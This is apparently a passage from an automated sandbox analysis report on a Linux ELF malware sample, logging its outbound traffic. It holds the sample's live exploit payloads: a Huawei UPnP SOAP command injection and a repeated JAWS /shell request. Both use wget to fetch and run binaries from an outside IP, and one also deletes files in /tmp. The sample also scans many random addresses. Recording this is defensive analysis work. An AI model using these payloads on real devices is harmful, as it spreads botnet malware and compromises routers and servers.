37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: /tmp/if33NMq1O2.elf (PID: 6209)Socket: 127.0.0.1::46157Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 125.99.61.248
              Source: unknownTCP traffic detected without corresponding DNS query: 188.31.132.249
              Source: unknownTCP traffic detected without corresponding DNS query: 218.104.120.155
              Source: unknownTCP traffic detected without corresponding DNS query: 109.22.76.238
              Source: unknownTCP traffic detected without corresponding DNS query: 105.222.161.47
              Source: unknownTCP traffic detected without corresponding DNS query: 36.250.94.164
              Source: unknownTCP traffic detected without corresponding DNS query: 36.220.206.248
              Source: unknownTCP traffic detected without corresponding DNS query: 75.153.38.249
              Source: unknownTCP traffic detected without corresponding DNS query: 121.124.157.78
              Source: unknownTCP traffic detected without corresponding DNS query: 151.2.244.36
              Source: unknownTCP traffic detected without corresponding DNS query: 63.35.22.70
              Source: unknownTCP traffic detected without corresponding DNS query: 13.136.36.95
              Source: unknownTCP traffic detected without corresponding DNS query: 195.61.104.203
              Source: unknownTCP traffic detected without corresponding DNS query: 171.117.55.103
              Source: unknownTCP traffic detected without corresponding DNS query: 200.121.211.201
              Source: unknownTCP traffic detected without corresponding DNS query: 217.3.114.143
              Source: unknownTCP traffic detected without corresponding DNS query: 157.151.175.28
              Source: unknownTCP traffic detected without corresponding DNS query: 175.235.90.206
              Source: unknownTCP traffic detected without corresponding DNS query: 196.63.2.211
              Source: unknownTCP traffic detected without corresponding DNS query: 183.5.71.160
              Source: unknownTCP traffic detected without corresponding DNS query: 73.0.223.77
              Source: unknownTCP traffic detected without corresponding DNS query: 180.87.155.99
              Source: unknownTCP traffic detected without corresponding DNS query: 14.146.51.250
              Source: unknownTCP traffic detected without corresponding DNS query: 162.100.78.199
              Source: unknownTCP traffic detected without corresponding DNS query: 81.79.88.136
              Source: unknownTCP traffic detected without corresponding DNS query: 65.131.253.201
              Source: unknownTCP traffic detected without corresponding DNS query: 148.169.158.142
              Source: unknownTCP traffic detected without corresponding DNS query: 92.120.142.194
              Source: unknownTCP traffic detected without corresponding DNS query: 45.75.3.207
              Source: unknownTCP traffic detected without corresponding DNS query: 151.112.118.249
              Source: unknownTCP traffic detected without corresponding DNS query: 114.101.118.217
              Source: unknownTCP traffic detected without corresponding DNS query: 123.185.9.87
              Source: unknownTCP traffic detected without corresponding DNS query: 130.64.97.224
              Source: unknownTCP traffic detected without corresponding DNS query: 126.234.158.13
              Source: unknownTCP traffic detected without corresponding DNS query: 211.107.200.145
              Source: unknownTCP traffic detected without corresponding DNS query: 162.136.80.202
              Source: unknownTCP traffic detected without corresponding DNS query: 213.195.173.61
              Source: unknownTCP traffic detected without corresponding DNS query: 12.139.160.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.160.32.239
              Source: unknownTCP traffic detected without corresponding DNS query: 182.44.138.73
              Source: unknownTCP traffic detected without corresponding DNS query: 189.130.103.99
              Source: unknownTCP traffic detected without corresponding DNS query: 122.215.41.204
              Source: unknownTCP traffic detected without corresponding DNS query: 40.102.4.26
              Source: unknownTCP traffic detected without corresponding DNS query: 189.61.2.65
              Source: unknownTCP traffic detected without corresponding DNS query: 101.119.237.226
              Source: unknownTCP traffic detected without corresponding DNS query: 103.131.218.58
              Source: unknownTCP traffic detected without corresponding DNS query: 155.168.79.64
              Source: unknownTCP traffic detected without corresponding DNS query: 203.127.143.44
              Source: unknownTCP traffic detected without corresponding DNS query: 103.233.38.136
              Source: unknownTCP traffic detected without corresponding DNS query: 19.5.47.213
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
